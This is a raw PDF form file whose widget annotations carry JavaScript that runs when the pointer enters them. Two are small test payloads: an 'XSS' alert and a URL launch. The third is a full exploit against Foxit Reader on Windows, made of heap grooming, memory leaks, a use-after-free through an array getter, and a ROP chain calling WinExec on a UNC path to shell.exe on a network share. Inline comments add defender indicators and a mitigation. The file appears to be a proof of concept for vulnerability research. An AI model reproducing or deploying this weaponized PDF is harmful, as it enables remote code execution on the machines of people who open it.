%PDF-1.3
%�߬�
3 0 obj
<</Type /Page
/Parent 1 0 R
/Resources 2 0 R
/MediaBox [0 0 595.2799999999999727 841.8899999999999864]
/Annots [
5 0 R
6 0 R
7 0 R
8 0 R
]
/Contents 4 0 R
>>
endobj
4 0 obj
<<
/Length 24
>>
stream
0.5670000000000001 w
0 G
endstream
endobj
1 0 obj
<</Type /Pages
/Kids [3 0 R ]
/Count 1
>>
endobj
9 0 obj
<<
/Fields [5 0 R 6 0 R 7 0 R 8 0 R]
>>
endobj
5 0 obj
<<
/F 4
/Ff 32768
/Rect [28.35 785.2 85.04 813.54]
/FT /Btn
/T (FieldObject0)
/DA (/F1 0 Tf 0. g)
/Type /Annot
/Subtype /Widget
/Kids [6 0 R 7 0 R 8 0 R]
>>
endobj
6 0 obj
<<
/F 4
/Rect [28.35 785.2 85.04 813.54]
/V (opt1)
/Type /Annot
/Subtype /Widget
/Parent 5 0 R
/MK <<
/CA (l)
>>
/AS /Off /AA << /E << /S /JavaScript /JS ( app.alert('XSS')) >> >>
/AP <<
/D <</Off 10 0 R /undefined 11 0 R >>/N <</undefined 12 0 R >>>>
>>
endobj
7 0 obj
<<
/F 4
/Rect [113.39 785.2 141.73 813.54]
/V (opt2)
/Type /Annot
/Subtype /Widget
/Parent 5 0 R
/MK <<
/CA (l)
>>
/AS /Off /AA << /E << /S /JavaScript /JS ( app.launchURL("https://github.com/dajneem23", true); ) >> >>
/AP <<
/D <</Off 13 0 R /undefined 14 0 R >>/N <</undefined 15 0 R >>>>
>>
endobj
8 0 obj
<<
/F 4
/Rect [170.08 785.2 255.12 813.54]
/V (opt3)
/Type /Annot
/Subtype /Widget
/Parent 5 0 R
/MK <<
/CA (l)
>>
/AS /Off /AA << /E << /S /JavaScript /JS (
// Shared state for the functions below.
// heap_ptr is assigned in leak_heap_chunk, foxit_base in leak_vtable,
// and pwn_array is filled in alloc_at_leak and overwritten in control_memory.
var heap_ptr = 0;
var foxit_base = 0;
var pwn_array = [];
// Creates `size` Text annotations on the current document and destroys each one
// immediately. Nothing is returned and the local array is discarded.
// Callers in this script pass 0x400. The name suggests heap grooming; that is an
// inference, the code itself only shows the create/destroy burst.
// Triage signal: document JavaScript that adds and destroys annotations in a tight loop.
function prepare_heap(size){
var arr = new Array(size);
for(var i = 0; i < size; i++){
arr[i] = this.addAnnot({type: "Text"});;
// destroy is only called when addAnnot returned an object
if (typeof arr[i] == "object"){
arr[i].destroy();
}
}
}
// Allocates three 128 MiB ArrayBuffers in a row and drops each reference.
// Presumably meant to push the script engine into a garbage collection, as the
// name says; the code does not call any explicit collector.
// Triage signal: repeated very large ArrayBuffer allocations that are never used.
function gc() {
const maxMallocBytes = 128 * 0x100000;
for (var i = 0; i < 3; i++) {
var x = new ArrayBuffer(maxMallocBytes);
}
}
// Fills pwn_array[0] through pwn_array[0x63] with Int32Array views, each over its
// own 0x40-byte ArrayBuffer. Called from leak_heap_chunk just before heap_ptr is read.
function alloc_at_leak(){
for (var i = 0; i < 0x64; i++){
pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
}
}
// Overwrites every element of every pwn_array view with one address:
// foxit_base plus a fixed offset, labelled by the author as a stack-pivot gadget.
// Depends on foxit_base having been set by leak_vtable and on pwn_array having
// been filled by alloc_at_leak.
// NOTE for review: the hard-coded offset presumably ties this to one specific
// build of the target module; the page does not say which version.
function control_memory(){
for (var i = 0; i < 0x64; i++){
for (var j = 0; j < pwn_array[i].length; j++){
pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
}
}
}
// Derives foxit_base from the first 32-bit word of a newly created 0x60-byte ArrayBuffer.
// Sequence: create and destroy one Text annotation, call gc, call prepare_heap with
// 0x400, allocate the buffer, read word 0, keep its upper 16 bits, subtract 0x01f50000.
// A fresh ArrayBuffer is specified to be zero-filled, so the read is only useful if
// the host hands back stale memory; presumably that is the information leak the
// function name refers to. Statement order matters here and must not be rearranged.
function leak_vtable(){
var a = this.addAnnot({type: "Text"});
a.destroy();
gc();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
// mask to a 64 KiB boundary before subtracting the fixed offset
var leaked = stolen[0] & 0xffff0000;
foxit_base = leaked - 0x01f50000;
}
// Sets heap_ptr from the second 32-bit word of a newly created 0x60-byte ArrayBuffer.
// Sequence: create and destroy one Text annotation, call prepare_heap with 0x400,
// allocate the buffer and a view on it, call alloc_at_leak, then read word 1.
// As in leak_vtable, a fresh buffer should read as zero, so a non-zero value here
// presumably reflects stale heap contents. Unlike leak_vtable, gc is not called.
function leak_heap_chunk(){
var a = this.addAnnot({type: "Text"});
a.destroy();
prepare_heap(0x400);
var test = new ArrayBuffer(0x60);
var stolen = new Int32Array(test);
alloc_at_leak();
// read happens after alloc_at_leak has populated pwn_array
heap_ptr = stolen[1];
}
// Allocates 0x10 ArrayBuffers of 0x60 bytes and writes the same 24 dwords into each.
// Dword 0 is heap_ptr, dwords 1 through 0x0b are constants or foxit_base-relative
// addresses that the author's inline comments label as gadgets and the WinExec
// import slot, and dwords 0x0c through 0x17 are a zero-padded string.
// Called from the getter installed in trigger_uaf.
// Indicator for defenders: dwords 0x0c to 0x13 are little-endian ASCII for a UNC
// path to shell.exe in a share named share on host 192.168.1.10, a private
// address. Outbound SMB from a PDF reader process is the matching network signal.
function reclaim(){
var arr = new Array(0x10);
for (var i = 0; i < arr.length; i++) {
arr[i] = new ArrayBuffer(0x60);
var rop = new Int32Array(arr[i]);
rop[0x00] = heap_ptr; // pointer to our stack pivot from the TypedArray leak
rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
rop[0x02] = 0x72727272; // junk
rop[0x03] = foxit_base + 0x00001450 // pop ebp; ret
rop[0x04] = 0xffffffff; // ret of WinExec
rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
rop[0x0a] = foxit_base + 0x0041c6ca; // ret
rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
//Path to executable
rop[0x0c] = 0x39315c5c;
rop[0x0d] = 0x36312e32;
rop[0x0e] = 0x2e312e38;
rop[0x0f] = 0x735c3031;
rop[0x10] = 0x65726168;
rop[0x11] = 0x6568735c;
rop[0x12] = 0x652e6c6c;
rop[0x13] = 0x00006578;
rop[0x14] = 0x00000000;
rop[0x15] = 0x00000000;
rop[0x16] = 0x00000000;
//End Path to executable
rop[0x17] = 0x00000000; // adios, amigo
}
}
// Creates a Text annotation named uaf on page 0, then assigns to its point
// property an array whose element 0 is an accessor instead of a plain value.
// The accessor destroys that same annotation, calls reclaim, and returns 1.
// Presumably the host reads element 0 while still holding the annotation, so the
// object is freed in the middle of the property assignment; the function name
// calls this a use-after-free.
// Triage signal: Object.defineProperties getters on arrays that are then handed
// to annotation properties, especially getters that call destroy.
function trigger_uaf(){
// captured so the getter can reach the document object
var that = this;
var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
var arr = [1];
Object.defineProperties(arr,{
"0":{
get: function () {
that.getAnnot(0, "uaf").destroy();
reclaim();
return 1;
}
}
});
a.point = arr;
}
// Runs the four stages in a fixed order: leak_heap_chunk sets heap_ptr,
// leak_vtable sets foxit_base, control_memory writes into pwn_array using
// foxit_base, and trigger_uaf performs the final annotation assignment.
function main(){
leak_heap_chunk();
leak_vtable();
control_memory();
trigger_uaf();
}
// Entry point of the script. The script is the /JS value of an /AA /E action on a
// widget annotation, so a viewer that honours such actions runs it when the
// pointer enters the widget.
// main is called only when app.platform is WIN and app.isFoxit equals the string
// Foxit Reader; on MAC the script only shows an alert. Other viewers do nothing.
// Mitigation for readers of this sample: disabling JavaScript in the PDF viewer
// prevents the action from running at all.
// app.alert(app.isFoxit)
if (app.platform == "WIN"){
if (app.isFoxit == "Foxit Reader"){
main();
}
}
if (app.platform == "MAC"){
// if (app.isFoxit == "Foxit PDF Reader for Mac"){
app.alert("This PoC is not tested on Mac, but it is likely vulnerable as well. Please test and confirm.");
// }
}
) >> >>
/AP <<
/D <</Off 16 0 R /undefined 17 0 R >>/N <</undefined 18 0 R >>>>
>>
endobj
10 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 56.69 28.35]
/Resources 2 0 R
/Length 243
>>
stream
0.749023 g
q
1 0 0 1 28.34646 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
endstream
endobj
11 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 56.69 28.35]
/Resources 2 0 R
/Length 480
>>
stream
0.749023 g
q
1 0 0 1 28.34646 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
0 g
q
1 0 0 1 28.34646 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
12 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 56.69 28.35]
/Resources 2 0 R
/Length 232
>>
stream
q
1 0 0 1 28.34646 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
13 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 28.35 28.35]
/Resources 2 0 R
/Length 243
>>
stream
0.749023 g
q
1 0 0 1 14.17323 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
endstream
endobj
14 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 28.35 28.35]
/Resources 2 0 R
/Length 480
>>
stream
0.749023 g
q
1 0 0 1 14.17323 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
0 g
q
1 0 0 1 14.17323 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
15 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 28.35 28.35]
/Resources 2 0 R
/Length 232
>>
stream
q
1 0 0 1 14.17323 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
16 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 85.04 28.35]
/Resources 2 0 R
/Length 243
>>
stream
0.749023 g
q
1 0 0 1 42.51969 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
endstream
endobj
17 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 85.04 28.35]
/Resources 2 0 R
/Length 480
>>
stream
0.749023 g
q
1 0 0 1 42.51969 14.17323 cm
12.7559 0 m
12.7559 7.04017 7.04017 12.7559 0 12.7559 c
-7.04017 12.7559 -12.7559 7.04017 -12.7559 0 c
-12.7559 -7.04017 -7.04017 -12.7559 0 -12.7559 c
7.04017 -12.7559 12.7559 -7.04017 12.7559 0 c
f
Q
0 g
q
1 0 0 1 42.51969 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
18 0 obj
<<
/Type /XObject
/Subtype /Form
/FormType 1
/BBox [0 0 85.04 28.35]
/Resources 2 0 R
/Length 232
>>
stream
q
1 0 0 1 42.51969 14.17323 cm
6.37795 0 m
6.37795 3.52009 3.52009 6.37795 0 6.37795 c
-3.52009 6.37795 -6.37795 3.52009 -6.37795 0 c
-6.37795 -3.52009 -3.52009 -6.37795 0 -6.37795 c
3.52009 -6.37795 6.37795 -3.52009 6.37795 0 c
f
Q
endstream
endobj
19 0 obj
<<
/Type /Font
/BaseFont /Helvetica
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
20 0 obj
<<
/Type /Font
/BaseFont /Helvetica-Bold
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
21 0 obj
<<
/Type /Font
/BaseFont /Helvetica-Oblique
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
22 0 obj
<<
/Type /Font
/BaseFont /Helvetica-BoldOblique
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
23 0 obj
<<
/Type /Font
/BaseFont /Courier
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
24 0 obj
<<
/Type /Font
/BaseFont /Courier-Bold
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
25 0 obj
<<
/Type /Font
/BaseFont /Courier-Oblique
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
26 0 obj
<<
/Type /Font
/BaseFont /Courier-BoldOblique
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
27 0 obj
<<
/Type /Font
/BaseFont /Times-Roman
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
28 0 obj
<<
/Type /Font
/BaseFont /Times-Bold
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
29 0 obj
<<
/Type /Font
/BaseFont /Times-Italic
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
30 0 obj
<<
/Type /Font
/BaseFont /Times-BoldItalic
/Subtype /Type1
/Encoding /WinAnsiEncoding
/FirstChar 32
/LastChar 255
>>
endobj
31 0 obj
<<
/Type /Font
/BaseFont /ZapfDingbats
/Subtype /Type1
/FirstChar 32
/LastChar 255
>>
endobj
32 0 obj
<<
/Type /Font
/BaseFont /Symbol
/Subtype /Type1
/FirstChar 32
/LastChar 255
>>
endobj
2 0 obj
<<
/ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
/Font <<
/F1 19 0 R
/F2 20 0 R
/F3 21 0 R
/F4 22 0 R
/F5 23 0 R
/F6 24 0 R
/F7 25 0 R
/F8 26 0 R
/F9 27 0 R
/F10 28 0 R
/F11 29 0 R
/F12 30 0 R
/F13 31 0 R
/F14 32 0 R
>>
/XObject <<
>>
>>
endobj
33 0 obj
<<
/Producer (jsPDF 4.1.0)
/CreationDate (D:20260227114239+07'00')
>>
endobj
34 0 obj
<<
/Type /Catalog
/Pages 1 0 R
/OpenAction [3 0 R /FitH null]
/PageLayout /OneColumn
/AcroForm 9 0 R
>>
endobj
xref
0 35
0000000000 65535 f
0000000270 00000 n
0000010757 00000 n
0000000015 00000 n
0000000196 00000 n
0000000382 00000 n
0000000554 00000 n
0000000824 00000 n
0000001133 00000 n
0000000327 00000 n
0000004912 00000 n
0000005290 00000 n
0000005905 00000 n
0000006272 00000 n
0000006650 00000 n
0000007265 00000 n
0000007632 00000 n
0000008010 00000 n
0000008625 00000 n
0000008992 00000 n
0000009118 00000 n
0000009249 00000 n
0000009383 00000 n
0000009521 00000 n
0000009645 00000 n
0000009774 00000 n
0000009906 00000 n
0000010042 00000 n
0000010170 00000 n
0000010297 00000 n
0000010426 00000 n
0000010559 00000 n
0000010661 00000 n
0000011010 00000 n
0000011096 00000 n
trailer
<<
/Size 35
/Root 34 0 R
/Info 33 0 R
/ID [ <CC7E51DFEA11268056681AE6399CB174> <CC7E51DFEA11268056681AE6399CB174> ]
>>
startxref
11216
%%EOF